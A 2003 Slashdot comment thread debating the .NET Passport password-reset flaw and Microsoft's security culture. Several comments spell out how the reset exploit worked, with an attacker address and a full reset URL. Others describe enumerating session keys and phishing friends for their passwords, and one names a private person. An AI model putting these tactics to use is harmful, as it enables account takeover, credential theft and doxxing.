Five seconds later, my roommate and I looked at each other and cracked up, realizing how stupid that was. Then we registered the account "RetrievalBot" and sent out emails to all of our friends with a tailored scam message. Long story short, we got the password we wanted, plus about fifteen more. :-)

Re:Another Hotmail Password Hack found on Kazaa

[doublem]

Did you get into your Hotmail account to change the username and password, thus keeping your account?

Or did the hacker have his wicked way with your e-mail?

Social engineering, still the best way to hack.

The problem with global accounts like Passport

[Jugalator]

One Company to rule them all
One Hacker to find them
One Exploit to bring them all
to the attacker's power

My company used incrementing session keys.

[Moderation+abuser]

On a web page which managed HR information, so you could log in, check the session key in the URL and then simply scan through nearby numbers to find and update all sorts of things about other logged in people.

'Twas a highly expensive piece of software as well...

Re:FUD

[IDIIAMOTS]

As of 6:30AM 5/8/2003 password reset ability works on passport.com.

For non-Hotmail e-mail addresses there exists an option to receive change instructions by e-mail. The URL that's generated on those pages is similar to the one in the exploit, yet entering "attacker" address other than "victim" address doesn't result in an e-mail sent. If the two addresses in the URL match that on the account the e-mail appears to be sent.

Looks like they indeed patched, although there should't be two addresses in the URL or even better, they shouldn't be passing them in URL at all.

No no no no no...

[McPLUR]

You guys are getting it ALL wrong, "secure computing" doesn't mean secure for the user.

It means financial security for Microsoft.

Re:FUD

[glesga_kiss]

Yeah!!! They should shut down the entire system until it's fixed. The legitimate users will love that!!

Joe's response

[KoolDude]

The remote user (attacker@attacker.com) will then receive an e-mail from the .NET Passport server providing a URL where the remote user can change the password. The form does not require the remote user to enter the previous password.

joe, d00d's friend: Oh u mean I can access anyone's account, change thier password etc. ?

d00d, l337 h4x0r: y35, u 0wn 7h3 4ccn7 !!!

joe: Wow, I get the idea, but how do I access mail from attacker@attcker.com without a password ?

d00d: P555557!!!!

his name is probably

[abhisarda]

Robert Babcock.

Do a search for Ashyukun on google.(www.nhmk.com/nes/ )

also at

(http://216.239.33.104/search?q=cache:q1XY1gcmAY AC :www.animemusicvideos.org/members/linkprobview.php %3Fdownload_id%3D1442+Robert+Babcock+ashyukun&hl=e n&ie=UTF-8).

Consider yourself lucky you don't have to deal with hotmail. Hmm.. what do guys with names like Dick Cheney do?

Re:his name is probably

[fataugie]

My wife had the same problem with hotmail.

Back up?

[SuperKendall]

Looks like that page is working again - perhaps the password reset screen has been repaired somehow? Don't have a hotmail account to test with...

Re:Back up?

[Kredal]

it's back up, it told me that an email had been sent, but no email got sent. They probably just commented out the mail(); line.

Re:FUD

[Opie812]

That is most definatly NOT a "fix". If they turn the service back on, guess what'll happen...

OH OH OH, PICK ME!!! PICK ME!!!! I know!

Re: Procedure to inform them it's broken.

[BurritoWarrior]

When I attempted to contact Microsoft about the problem, they asked me for a credit card number. When I explained I didn't want support and was trying to report a bug, I was transferred to someone else who... asked me for a credit card number. Wash, rinse, repeat.

Dude,
They were just tyring to issue a refund to your credit card for the purchase price of Windows.

(Pssst, I also have this wicked cool eBridge if you want it).

Re: Procedure to inform them it's broken.

[gr0nd]

The traditional way on Bugtraq seems to be mailto:secure@microsoft.com.

I have to go with the crowd here....

[AlphaSys]

I usually stand up for the Redmond boys if there's some bashing going on and not alot of balance to the issue. But this is just an incredibly stupid hole to have open. Why would you ever, ever, ever pass details in the URL string that the user himself need not (and should not be allowed to) supply? If it is because you are passing it among servers in some fancy-schmancy web service scheme, then at least have the decency to hide the exploitable name/value pair in an http header or something (but even this should not be necessary for what they are doing , even if my guess as to how their backend works is wayyy offbase). Somebody said it earlier in the discussion that it is because developers (using the term lightly) add features without thinking of how to do it right and how to do it securely and just pass any old thing in the URL string, and they were right on the mark.

Some coders (again using the term loosely) at my organization used to do this absolutely all the time and I would bitch about how piss poor it was from a security angle (and regularly demonstrate how easy it was to circumvent the intended "security" mechanisms). Everybody laughed at me when I did... that is until one of our largest customers hired an outside firm to audit the "security" of the apps they were getting. It took the firm very little time to discover these nuggets, of course. It is interesting to note that they reported that the application security was among the poorest they had seen, but that the server configurations (my department) were among the tightest. The sad thing is the stupid customer basically thought the two canceled each other out, threw some extra money at redesigning the application to meet the standards it should have to begin with, rewarded our systems team which had done it right the first time with absolutely squat, and renewed the contract for another five years. Shows you how much the corporate world understands what's really going on.

Re:I have to go with the crowd here....

[MS_is_the_best]

I read your post, because I thought to have the same opinion: Microsoft software can have obscure exploits, just like every other (also open source) program, but this is really WAY to stupid. How can something this important to your company be SO easily exploitable??.

But I answer because your security idea of web apps is also very terrifying. Security through obscurity does not work! (passing variabless in headers is no security, and choosing weird names is bad coding practice and not more secure). Proper way is to put in the url what you need (?page_nr=3) and keep at the server the stuff that is only used after proper authentication. Perhaps at a very unknown website obscurity would delay the script kiddies a bit, but I think hackers are really to much motivated to hack Passport, to not try something other then IE (telnet passport.microsoft.com 80?).

But I'm glad you are a system administrator who knows how to secure his/her machines, those people are also too rare ....

Re:I have to go with the crowd here....

[AlphaSys]

No, you're right on. We agree to the letter. Obscuring by naming is not security. Obscuring by hiding it in the header is not security. And any serious malevolent is sniffin' ya or otherwise intercepting your transmissions to understand where to find what he wants of your data before he ever tries an exploit in a browser, telnet client, or even a custom app designed specifically to generate exactly the kind of packets your app expects to see. When I said "at least have the decency to..." I guess I should've prepended with "there is never a time when you should, but..."

In a more general sense, what I was saying was "at least make 'em analyse packets to figure it out, don't let any dumbass who knows how to hover a link or "view > source" tell you how stupid you are. At least put up some kind of fight. Many of the coders here have had to be browbeaten about this. Some of them argue "My job is just to make this work. You make it secure." I have to make them understand that nothing can secure bad code. Sometimes I have to all but rewrite their code (or worse, redesign the app flow) to show them what's secure. And half the time, they come back and ask "OK, why is that better? My way is easier."

I'm serious. Developers who really take security seriously to the extent that they design it into the app as opposed to "spray it on" after the fact are rare in the commercial world, unless they are working on products/projects that are specifically security-related. No one else seems to get it and they think it is infrastructure's job to make the insecure app secure. Good admins are so underpaid...

Re:I have to go with the crowd here....

[AlphaSys]

Fortunately for me, the boss and the two major PMs have learned to take me seriously on the subject. The boss just knows what he sees when the systems get audited; the PMs know it because they used to be core developers and I helped them fix the holes that got shot in their app designs.

My problem is with some of the developers that have come in since that time to fill the slots left open as these two guys moved up to PMs and the projects expanded at the same time. What you end up with is twice as many folks working at the code level with half as much understanding of where the projects began, their roots. That's where a lot of bad decisions get made. And a lot of these new developers know how to make code do the basic stuff, but they don't have the knack for application design that the original architects did. And they think the only folks on par to tell them what their code should or shouldn't do (or even how to validate that it does operate as expected while developing) are the PMs or The Boss. Like I said, it is lucky for me those individuals listen to me now. Many of my disagreements with these dev guys have ended up nearly in fisticuffs, and they are much bigger than I am. And there's a lot of them compared to just me.

Probably Microsoft code is difficult to maintain.

[Futurepower(R)]

After months of trying to understand Microsoft's situation (Windows XP Shows the Direction Microsoft is Going), I came to the conclusion that the Microsoft management style leads to mountains of sloppy code that is difficult to maintain. That's the only theory that seems to fit. For example, in Internet Explorer browser alone, there have been for years more serious security bugs than Microsoft fixed. There are, at present 14 security vulnerabilities.

Here is the recent record. The list of defects has been similar for years. Also, this is a record only of security defects, not all defects:

• June 18, 2002: 18 vulnerabilities
• August 8, 2002: 22 vulnerabilities
• September 9, 2002: 19 vulnerabilities
• November 19, 2002: 32 vulnerabilities
• December 9, 2002: 19 vulnerabilities. (Microsoft fixed 15 on Nov. 20, but two new ones were found.)
• May 8, 2003: 14 vulnerabilities

This is a terrible record for a company that has $52.9 billion in the bank. (See "Total Current Assets" in the upper left hand corner, which is the money available within the next few months. It takes time to spend a billion dollars, so the next few months is equivalent to cash.)

Obviously, Microsoft could fix the bugs if the company wanted to fix them. But the company apparently lacks the will to devote the resources necessary (IE still does not have tabbed browsing), and apparently also, it is not easy.

Lots of interesting methods...

[djh101010]

A few months back, my company underwent a security audit from one of the third-party companies who do that sort of thing. It was truly beautiful watching their analysts do things to our web-app which we had never intended people to do. They're real artists.

We're a small-ish company, these guys came in for a week, exposed some weaknesses and some stylistic quibbles, and they're fixed.

If we can bring in an expert in this sort of thing, why can't Microsoft? Is it arrogance, apathy, or ignorance, or something else?

Well

[Bunji+X]

They can always swallow their pride, scrap their insecure system and join the Liberty Alliance Project.

in the words of homer

[b17bmbr]

simpson that is...

DOH!!!

easy tabbed browsing

[b17bmbr]

open up VB. insert tab control. insert web browser control. add an add tab function. viola, tabbed browsing.

Re:easy tabbed browsing

[Prior+Restraint]

open up VB.

So, you're saying I can have tabbed browsing in IE for only $109 US? Pass.

Re:easy tabbed browsing

[b17bmbr]

warez, dude, warez!!!

Re:easy tabbed browsing

[Prior+Restraint]

dialup, dude, dialup!!!

Re:easy tabbed browsing

[b17bmbr]

bummer

Other ways in? Let's ask Google!

[mnemotronic]

A Google search on passport email "reset your password" yields some interesting links with (possible?) alternate URLs for this exploit. Is MSoft's domain the only place where this works? I would assume there's other sites that have bought into MS's security tripe and have setup passport servers, or is passport a central repository?

Vulnerability still there

[mencik]

I just tried the attack with my own hotmail account and was able to change the password. For those of you trying, remember to change the attacker@attacker.com to another valid email account, or you won't receive the reset email message. That should be obvious, but apparently some posters hadn't figured that out.

Re:FUD

[etcpasswd]

Insightful? Please!

This is more like the mechanic giving you a rental car while he fixes your own car.

1. Can you hear the screeching sound? No.
2. Will the car stop? No.

Compare your flawed analogy with MS:

1. Is Passport still vulnerable? No.
2. Is the Passport service working now? Yes.
3. Will the users be able to change their passwords while Microsoft is working on it? No.
4. Can MS getaway with disabling the option to change passwords permenantly? No.

What was your point again?

ha ha, funny not.

[twitter]

Passport is not the kind of thing you should take lightly. This might be amusing if Microsoft were not a monopoly and they were not trying to foce this "one name one passport" as the end all for comerce, identification and control. "Kids Passport" is especially creepy and Orwellian. Microsoft is too big to ignore and the evil things they do should not be understood as just another fact you can't do anything about, such as the world being round.

Sure, it's buggy. Police States are always incompetent. They also reasure their victims with crap like, " Sign in on any computer that has Internet access. .NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options." The Nazis were equal dullards but look how far they got. Incompetence does not keep you from being nasty, thourough and powerful.

Paranoid yet? You should be. Microsoft is bussy building tools and attitudes the most UnAmerican administration would value. They are just the kind of hacks the Nazis picked up and stuck into government and university positions. The time to fight the maddness is now, before it becomes official.

Re:ha ha, funny not.

[grahamlee]

Paranoid yet? You should be.

Perhaps I might be, if I used a .NET Passport for any serious work. I don't, and the state of the world is not yet at the point where it should be deemed necessary for anything.

I have a couple of passport accounts, one for .LINUX AMSN, and one for my WinXP account. Past my name (which is also in my Slashdot account details ;-) they contain no real information about me.

Come to that, I don't tend to use long-term authentification information for anything. All of my online transactions are done once-off through companies with SSL transactions, and if they cannot provide this then I deal with them in person or not at all. I most definitely leave all One-Click-type functions off.

So what am I wittering on about? Well, I think your Orwellian view of the Passport is not relevant now, nor do I think it is likely to be in the future. I know people who use their WinMachines for surfing the web and reading e-mail, maybe the occasional game of Minesweeper, who will not use Passport or any similar system, no matter how secure they claim to be, on the basis that it's stupid to. If you put all of your private information under the protection of someone you don't know then you effectively have no control over 0wn0rship of that information.

Insightful

[Futurepower(R)]

What's even funnier about this is that it is modded, "Insightful".

Re:Insightful

[Reziac]

Well, M$ does have more cash in hand than some small banks... Hey, why *don't* they get into the banking business? After all, they already have all the credit card information they need... ;)

"Alternative" to Passport

[nilsjuergens]

Granted, single-sign-on is convenient, but you can achieve nearly the same convenience using mozilla (and probably any other browser).

Just create a random password for every service you use, log in once and let mozilla store the username/password pair in the password manager and make sure access to the password manager is password protected. That way you only have to remember one password, but you still have different passwords for different sites which are reasonable secure (for they are random generated).

Now if Mozilla supported tracking the age of passwords and telling you to generate a new password for a site once the password reaches a certain age, that would be great!

Re:"Alternative" to Passport

then you need to make backups of the password file for mozilla becuase if you had a disk failure and you lost all of your random passwords then you would be screwed

Re:"Alternative" to Passport

[nilsjuergens]

Why, of course! But with the os i use, mozilla stores its stuff in my home dir, which i have to backup now and then anyway.

And i also use el-cheapo software raid5 with ide drives, so it does not happen too often i actually need my backup.

Backup of important files is always implied, but of course you cant mention it often enough :)

Insightful? Oh please.

[Petersko]

i learned about this in a CS course, and i couldnt help thinking, "duh, any sensible person wouldnt be that stupid..." obviously i was wrong.

Another CS student wondering everybody seems so gosh darn stupid while they are so obviously bright is hardly noteworthy. The post comes down to "Duhh.... they done BAD!", and it gets a +5 insightful?

Re:Insightful? Oh please.

[Larsing]

Imagine what the world would be like if students didn't forget all these obvious wisdoms once they've gotten their MSc?

Imagine all the people... ...surfing the web in peace.

Anti-Microsoft Groups?

[simetra]

Is/are there any Anti-Microsoft advocacy groups out there? I'm talking about respectable, legitimate groups that have seriously documented how and why Microsoft's practices are bad. I'm not talking about Joe H4X0R's I-Hate-Microsoft geocities webpage.

If not, perhaps there should be, with the goal to educate people who help MS - the suits who are suckered in to the Ad campaigns and really have no idea about such things.

Thanks.

Re:STILL NOT FIXED

[madcarrots]

i tested it with a friend's account. it seems that a page comes up displaying the message that the email has been sent, however, it has not arrived in my inbox.

How do I close a .Net Passport account?

[bblackfrog]

This may be a naive question, but how do I go about closing a .Net Passport account? I want Microsoft to remove all of my personal information from their servers.

There seems to be no way to do this online. A call to MS customer service resulted in an "I dunno, I can't do that." answer.

btw, I'm not dumb enough to actively participate in Passport. I bought something online last summer from a small company, and after completing the purchase, I was shocked to see that Microsoft was handling the transaction with Passport. Damn it! Now they have my credit card info, shipping address, etc. Guess I should have read the fine print before I clicked Sumbit...

Anyone successfully done this?

Re:And the open source community...

[sqlrob]

Isn't that what PAM is?

Re:FUD

[hellswraith]

The service still works. What they did is turned off a "FEATURE" that allows you to change your password. They may implement new code on that feature to make it more secure than in the past, then they may choose to turn that "FEATURE" back on. It is NOT required for the service to be used, so there for it was a FIX. They plugged the hole. Simple. Sure, they took away a feature to do this, but it was still fixed. Now they may redeploy this feature later, but then it will be an upgrade to the service.

To answer your question, if they stopped everyone from logging on, then the service would be UNUSEABLE, then it would NOT be a fix.

Re:FUD

[N3WBI3]

So if I am an ISP and I have a hole in my service is unplugging the server a fix?? that is basically what they did. Now its the right thing to do (make sure nobody can chage **until** you have it fixed..

Re:FUD

[N3WBI3]

No its like a lock smith putting glue in the keyhole of your door when you need him to let you in because you lost your key! Well we know nobody can use your lost key to get in so its fixed right?

Fun Code

[Adam9]

This is off of their forgotten password page. Can you give us more code please? Thanks.

To reset your Microsoft® .NET Passport password, please enter the following information and then click Continue.

Help
{{if RSP._isHotmailMode }}{{else}}{{endif}}

*Sigh*

[White+Roses]

The unfortunate thing is that I don't know anyone who is both (a) stupid enough to use Hotmail and (b) grotesquely stupid enough to store personal information in Passport.

I need to make some stupid friends, it seems. Well, friends who are more stupid than the ones I have now, at any rate.

But it's a good exploit, anyway. Kudos to the person who slaved for almost 15 minutes to figure it out (that's not a slander against the cracker in question, but against the pathetic sec- . . . secuuu- . . . jeez, I can't even call it what MS wants me to think it is).

YES Re:How do I close a .Net Passport account?

[redwoodtree]

Yes, in fact if you log in and go to your profile, there's a link in the bottom left hand nav that says "CLOSE .NET PASSPORT ACCOUNT"

You click on that, agree to their terms and close your account right there in three clicks.

Goodluck

Re:People still use POP?

[Gleeb]

They do. At least, my ISP does (BT, the national telco) as well as Gamespy. Never really tried IMAP, to be honest. I thought it was legacy. But then it may be and you're all laughing at me :(

Not fixed yet...

[TrIp0d]

Yeah, ha! Trustworthy computing! Sure...no, it's not fixed yet. I just checked it out (on my own hotmail account, of course).

Muhammad Faisal Rauf Danka should be thanked!

[Jerry]

He could have given that info to terrorists and they could have funneled pilfered monies into all sorts of dangerous activities. By doing his best to expose the flaw he has, no doubt, save many lives.

Pump & Dump

[SgtChaireBourne]

Given that there is a history of questionable accounting practices, the accuracy of $ 52 900 000 000 current assets seems somewhat shakey. Especially since it is ultimately self-reported, albeit via Yahoo via Edgar. Enron was looking mighty good for a long while, too.

That Microsoft could have fixed many more bugs, is something that could be see as one possibility, but in only the past tense. It looks like things got out of hand a while ago and that the management could be just riding the company down - pump and dump

Don't forget that benefits have been cut way back and there's also been outsourcing like mad. Consultants and contractors don't show up as layoffs when you let them go.

Better Hidden Flaws and Vulnerabilities?

[webzombie]

Yet another post about flaws and vulerabilities in yet another Microsoft product or almost product and it got me a thinkin' that there seems to be a slight undercurrent of familiarity to this scenerio.

I think possibily Microsoft has found a way to use it's own flawed products to convince politicians and the like that a hard-wired security system is inevitable.

And if MS is going to control this technology then they will most certainly use it to not only dominate existing and new markets but they will also use it to hide their own flaws and vunerabilities.

Any security technology that is likely to have the impact such as MS's Trust-Worthless Computing could have should be a public and open source technology or standard not another monopolistic revenue source...

Re:FUD

[caluml]

What's the betting they've just renamed it? Try emailpwdreset2.srf or similar, lol ;)

deja vu?

[m1chael]

it happens when they change something in the redmond.

Re:FUD

[HiThere]

It's bad, but it *is* much improved for anyone who stores anything sensitive on hotmail/passport. Remember "Dingbats have rights too".

Re:FUD

[ymgve]

Does the word 'damage control' mean anything to you?

404ing the page took them 2 minutes, and now all users are relatively secure again. If Microsoft had done nothing while they fixed the bug, several million hotmail accounts would still be vulnerable, and would probably stay that way for atleast a few hours.

Re: .sig (OT)

[@madeus]

Microsoft Rule #3: GUI standards are no longer necessary. Shiny objects are always user-friendly.

I think this can be even more appropriately applied to Apple too (after all the years of UI guidelines that went out the window with Mac OS X ;).

Re:FUD

[girl_geek_antinomy]

Oh, very true. I guess my point was that their response (canning the service), though surely the only good first response, doesn't justify 'stop having a go at Microsoft, look how well and quickly they've fixed it' type responses. Amputation != Cure.

.NET ads

[DJ+Rubbie]

Wow, a .NET advertisement under a .NET vulnerability article!

Re: Procedure to inform them it's broken.

[NickFitz]

A similar one bit me when I was upgrading my machine the other year.

I'd installed an AMD K2 running at 500MHz, and Windoze 95 crashed at the point of initialising the desktop. Booting into DOS worked fine, so the machine wasn't broken. A search of the Knowledge Base showed that this was a known bug on AMD procesors running over ~300MHz, and a patch was available.

Downloaded the patch to a floppy, put it in the machine, tried to run it from the command line, got the message:

This program can only be run under Windows

To labour the point: this patch fixed a bug which prevented Windows from starting.

I trust Microsoft!!!

[Black+Copter+Control]

I trust them to produce insecure software.

Needless to say, I'm writing this from a Linux box.

Re:Probably Microsoft code is difficult to maintai

[Gauchito]

It's backwards. What incentive does a company have to change, when its current habits have netted it $52.9 billion in cash?

MS problem is their own culture and codebase

[Genus+Marmota]

I don't mean to bash MS (there are so many on /. that do it so well) but realistically these kinds of security problems are very unlikely to stop happening. If you've worked there as a dev, even if only for a few months, you probably have a good idea why this is. It's not because people are uncaring or incompetent. The big obstacles are 1) their own history and culture and 2) the enormity of their codebase. Here's why I think so.

If you've made any study of it at all you know that effective security results from a process that starts before the software is even written. There is no protocol that will save you from logic errors (like the latest Passport hole). To do this reqires a good understanding by the devs of security and their adherence to design principles and coding practices. To do that you need a software development methodology that enforces the consistent application of those priciples and practices. Therein lies the problem.

In my little corner of MS (though by all accounts it was typical of the company as a whole) what was prized above all was meeting requirements and deadlines. Virtually no energy was put into the development environment (hence the hour I spent every morning just downloading the nightly build, the insane .bat scripts, constantly fixing my own NT install as a $55/hr contractor). Nobody got "c-hours" for making life easier. More importantly, there was little value placed on design, good technique. Lip service was paid in meetings and reviews, of course, and superficial style details received obsessive scrutiny. Code reviews often bogged down on correct hungarian notation but a unit test consisting of "return true" was perfectly ok. The "heros" were people with big brain muscles who spent nights and weekends hammering out code to meet the latest deadline.

The result of all this was a coding culture that I called the kingdom of cut-and-paste. I was actually encouraged to write routines by starting with someone else's routine to do something unrelated and edit it to do my task. A colleague would stand over my shoulder browsing the codebase looking for something convenient to steal. It was a shock to realize how little code people actually wrote. This is one of the things that I hated about working there, that I spent so much of my time fscking with the various APIs, incomprehensible include file heirarchies and so little time writing C++.

Well, in my Intro to Fortran class in '77 the prof explained why massive code duplication is a bad idea, and the results are visible in every MS product. You can't fix a bug in one place, you have to fix it every place it got copied to, and you don't know where those are. The codebase is now on the order of 100'sM lines or better? Probably not even MS has a good handle on this, because they can't know for sure how much duplication (with tiny variations) there is (clue: lots).

Once a company grows to a considerable size it's really hard to change the culture. I've seen this at several startups. MS is like a battleship or an aircraft carrier. High-tech and deadly but turning that boat around is really hard and simply may not happen in a short distance. Expecting them to change their performance WRT security in a few months (or year) is kind of like expecting the old Soviet apparatchiks to start respecting civil liberties and human dignity because the Central Comittee sends out a memo. Good luck. It's a city unto itself in Redmond, its own little world. And even if you did, what the hell are you going to do about the millions of lines of (largely incomprehensible) code in the installed base? The millions of systems in the wild that are unpatched and unmaintained?

I see many of the same disasters being recapitulated in .NET. They may talk security and I'm sure they're trying hard but I expect that their long term strategies are going to rely more on legislation than the (probably impossible) task of bringing their products t

Re:MS problem is their own culture and codebase

[Sanga]

Order can be returned to the "kingdom of cut and paste" by reviewing the source points of original code.

Come ye whose work has been pirated by MS -- come forward to deliver once more for the betterment of humanity and help MS undo the tangle of copied and pasted code.

cool

[La+Camiseta]

So now maybe I can get back that account that I forgot the password for. Sweet.

Whew!

[oaf357]

Glad I used a totally unique password and didn't provide any REAL information to those .NET clowns.

Re: Procedure to inform them it's broken.

[seangw]

The only way that I've gotten to a level where I could almost "report" a bug would be after dealing with tech support (@ $250 / incident) for a few days.

Trolled to death...

[wirelessbuzzers]

Why must this be the fate of the good jokes? That and "the infidels are committing suicide at our firewall" were the best I'd heard in awhile, but now they're just old...

Quit ruining all the good jokes!

.NET vulnerability variation

[Chatmag]

Chatmag.com last week had reported a similar vulnerability, coming in an unsolicited email with the subject: "Someone has sent you an Insta Kiss". Clicking the link in the email takes a user to a site hosted on a server in The Netherlands, with what appears to be a valid Hotmail/Passport login screen. It actually captures a users username and password. We informed Microsoft on the 3rd of May, and the site was removed. The email in question is still being sent to users, the link referenced in the email is now out of service.

On no my spam!!

[wendigo2002]

So my spam isnt safe at hotmail anymore?

Weeell... if they really want to... go for it

[UTPinky]

Oh well... so all this means is someone can break in and read the 30 pieces of spam i get in that account every day... *shrug* hope they enjoy themsleves...

culture of security

[aphor]

A: You're way off about changing peoples' approach. The sad fact is people like that are in pain-avoidance mode. Give them pain. Give them a productive way to avoid the pain. There must be code review. One guy does a little coding, another guy has to sign off on it. A third has to sign off that it has been tested (whether or not any testing actually happens is not important). All three get burned if anything bad happens: after-hours or weekend work to fix it NOW? The rate of code churn goes down, and the quality goes up. Grumbling goes up, but it sounds like a personal problem to me... :)

B: You're dead-on-target about doing other people's work. You can't have individual effort and collective accountability. You have to have collective work and collective accountability. Oh, and if you're smarter than others: the sharpest knife always gets used the most. Adjust to it. One day you will be enlightened.

C: You are dead-on-target about the financial sector :). That does not mean it won't work in hospitals or law offices though. It just means *somebody* has to fulfill the role of irate customer when the slackers need it.

Culture is not something you create at the water cooler or in seminars. It is dictated by the unique combination of supply and demand wherever you are. You can change the supply (of people or other resources), or the demand. The boss/team-leader mediates customer demand and needs to have some real power over the programmers in the same way that customers have real power to affect the company's bottom line. If you lack accountability, that isn't a software development problem. You're just going to get shoddy results, software security, housekeeping, everything included.

The moral of the story: accountability is security. So, if you want a culture of security, improve your accountability! It has positive potential for Maslow's "self-actualizer" types too.

Re:Probably Microsoft code is difficult to maintai

[Stonan]

Actaully this makes perfect sense for a company that is designed for making money.

You can't make money selling fully functional software or by releasing patches. You can make money selling newer versions of disfunctional software.

!= vulnerability

[shiflett]

That's not a vulnerability. That's just unaware (stupid?) users giving their username and password to the bad guys.

Why not fix the most public and severe bugs?

[Futurepower(R)]

This theory would make sense, except that Internet Explorer's bugs are so public and severe that it would make sense to fix them, even if, overall, Microsoft's business model is to make money by delaying delivering a good product.

Re:FUD

[alienw]

That's what they are doing, you moron. And yes, if you have an ISP, unplugging ethernet from the server is the first step of any fix. You should also turn off the power when you work on your house wiring. DUH!!

Microsoft VP sells all.

[Futurepower(R)]

Very interesting links.

Look at this: A Microsoft Group Vice President, Kevin R. Johnson, received 322,560 shares of stock 3 days ago and sold it that same day. He received 244,760 shares of stock on March 6, 2003 and sold that the same day.

Does he know something normal investors don't? Isn't he indicating that he expects MS shares to go down?

Re:Microsoft VP sells all.

[IsaacW]

Note that even after both of these sales he still owned around 5700 shares of Microsoft stock. The options, exercised at ~$6 and ~$7 per share represented a significant paper profit. Perhaps he wanted to realize that profit. If anything, what he knows that normal investors don't is a rather obvious and oft-ignored piece of investment knowledge: that keeping more than 5% of your total investment holdings in a single security is a bad idea, and he simply wanted to use the proceeds of the sales to diversify his holdings. I don't know, because I'm not him, but please don't go slinging around potential allegations of insider trading.

Re:Probably Microsoft code is difficult to maintai

[prnd_ndrd]

I mean this as a serious question: I wonder how those numbers of bugs compares to an open source project like Mozilla, Konquerer, etc. Sometimes I think Microsoft, AOL, and other traditional "Bad Guys" are perceived as having crappy software simply because they are under more scrutiny (i.e. millions of eyeballs interacting with the programs daily).

Debate

[floydman]

There is always this debate about viruses and hacks always available for M$ just because their SW is more widespread the *nix. Actually i totally disagree to this, i think they have a serious problem with their core engines, the basics or pilgrims they are standing upon are corrupt. The more they build over these corrupt basics, the output gets to be quite wacky. They tend to fix the wackys tuff with no use, cause the core is not optimized or secure..

/*When ur 1 of the few to land on ur feet, what would u do 2 make ends meet??!*/

just checked my vulnerability...

[generationxyu]

look at this url: https://memberservices.passport.net/ppsecure/MSRV_ ResetPW.srf?lc=1033&sf=1&id=2&ru=http://www.hotmai l.msn.com/cgi-bin/sbox&tw=20&fs=1&cb=&cbid=24325&t s=0&sec=&mspp_shared=&seclog=0&kpp=2&svc=mail&mspp jph=1&em=jameslongs@hotmail.com my favorite parts: &sec= &seclog=0 good to know they're still keeping track of possible exploits even as much as 12 hours after this has been discovered...

And you thought...

[Anonymous+Brave+Guy]

or just go for abuse@hotmail.com.

And you thought a slashdotting was a heavy load... ;-)

Don't worry too much

[Anonymous+Brave+Guy]

If Passport were being used for copyright protection, it would be a federal crime to report this security vulnerability.

It might be a federal crime in the United States, but fortunately, most of the rest of the world has a smarter legal system. Or perhaps the US government plans to block all incoming traffic from outside, so no-one can read the EU- or Asian- or Australian-based news sites and see this for themselves...? :-)

Re:FUD

[Lord+Sauron]

> Does the word 'damage control' mean anything to you

FYI, 'damage control' is not a word, but two.

Re: Procedure to inform them it's broken.

[DBMandrake]

To install it, you either need to jumper the CPU down to a slower speed, or boot the computer in Safe mode, as the bug doesn't prevent booting in safe mode...

Annoying, yes.

Don't rest on your laurels

[xixax]

M$ has previously moved heaven and earth to do things when they were felt to be important. Look at their bloody minded efforts to turn around Internet.

If M$ really commits to being secure, they will get much better at it. It just may take a while.

Besides, all this lousy crud will merely serve to reinforce how good and essential Palladium is.

(though I do wonder how Palladium will be able to tell a worm running in a poorly written app from a legit process)

Xix.

Re: Procedure to inform them it's broken.

[mcrbids]

Yes, I remember that bug. Funny, 'cause you could usually get windows to load into safe mode, but you still couldn't install the patch.

The only thing I ever found that worked was to slow the processor down to 266 Mhz, install the patch, then clock it back up again.

This was for Win95x on AMD K6-2 systems.

His vote is that Microsoft stock will not go up.

[Futurepower(R)]

I am certainly NOT saying that he is doing anything illegal. I am only saying that by selling 567,000 shares of Microsoft stock, and keeping only 5,700 shares, he is indicating, loud and clear, that he has no strong idea that Microsoft stock will go up. Presumably, he would rather have more money than less. If he had a good idea that Microsoft stock would go up, he would have kept more shares, even if he wanted to diversify.

I wonder about this too.

[Futurepower(R)]

I wonder about this too.

I notice that Opera is listed as having 3 security vulnerabilities in the pivx.com link above. However, Opera's history is that the security vulnerabilities get fixed quickly.

I found a serious bug (204668) in a recent build of Mozilla (a stack overflow, not a security vulnerability), reported it using Mozilla Bugzilla, and they fixed it within a day.

I complained of another bug in Mozilla, and they had an answer in two hours. Those Mozilla people are seriously interested in getting the job done.

Maybe the world only has the intellectual resources to produce one or two good browsers.

Both rate and volume increasing

[SgtChaireBourne]

Both the frequency and volume of sales is increasing: They're all selling as fast as they get.

People, including CEOs, may not understand or wish to understand "IT" so it is easy to bullshit them. In contrast, nearly everyone understands money. So it's no surprise that, as the FTC is fixing to knock them in the head, there are many who see the club descending. If the FTC doesn't finish them, then losing monopoly rents will. It may drag out in the courts and ad campaigns a bit to give time for counting coup.

Correction!

[@madeus]

Just noticed - I spend 3 *months* doing the planing (not 3 years, as it appears, must have deleted the word 'months') oops.

Re: Procedure to inform them it's broken.

[NickFitz]

Yup, in the end I had to drop the processor down to 250, patch, and bump it up again.

It reminded me of the time someone posted to a Netscape newsgroup wanting a JavaScript snippet that could determine whether JavaScript was enabled or not. Even better, someone posted a reply. Of course, it only worked if JS was enabled :-)

Re:FUD

[N3WBI3]

Unplugging the Computer is the first thing you should do yes, what the hell do you think "Now its the right thing to do (make sure nobody can change **until** you have it fixed.." means you mental midget>. But unplugging the server is not fixing the problem its making sure nobody exploits the problem a fix is a steady state solution.

Now if you want to actually read and not have a knee-jerk reaction Ill put in in terms even a 3rd grader like you could understand. They did the right thing by killing the service asap, but that does not fix the problem.

Re:I have to go piss on Tsarkon....

[AlphaSys]

Oh, Tsarkon, my hero... I was so blind.

Seriously, though. I thought you'd given up on me. Thank God I was mistaken. It's so cute how you put your utterly baseless arguments and assumptions as to my intelligence, attitude, aptitude and skill in one AC post and your vain libel in another in the attempt to appear as two separate ACs. Truth told, you don't really even constitute a half poster, much less more than one.

Nice to know that I can put some bait out there and get you to waste some time in reply. The difference is I can troll you and still provide decent enough conversation/info to be worth something to the whole discussion.

No, I don't profess to be a coder. I went into systems to avoid any coding that requires thinking above the scripting level. That's just it. I'm amazed that some folks who base their entire livelihood on their ability to design and implement applications have so little a clue of how to do it.

